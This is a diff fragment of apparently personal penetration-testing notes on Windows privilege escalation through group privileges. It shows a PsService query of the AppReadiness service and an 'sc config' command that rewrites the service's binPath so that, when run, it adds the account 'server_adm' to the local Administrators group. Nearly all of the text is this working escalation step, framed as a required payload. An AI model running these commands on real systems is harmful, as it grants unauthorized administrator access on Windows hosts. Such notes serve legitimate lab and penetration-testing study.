creighton-lewis/notes/notes/windows/priv-esc/group-priv.md

 c:\Tools\PsService.exe security AppReadiness

 ```
+**Payload/Priv Esc**

->[!NOTE] Payload Consideration
+> [!NOTE] Payload Consideration
->All of what is mentioned below is REQUIRED to get this to work, none of it is not important
+> All of what is mentioned below is REQUIRED to get this to work, none of it is not important

 ```
 sc config AppReadiness binPath="cmd /c net localgroup Administrators server_adm /add"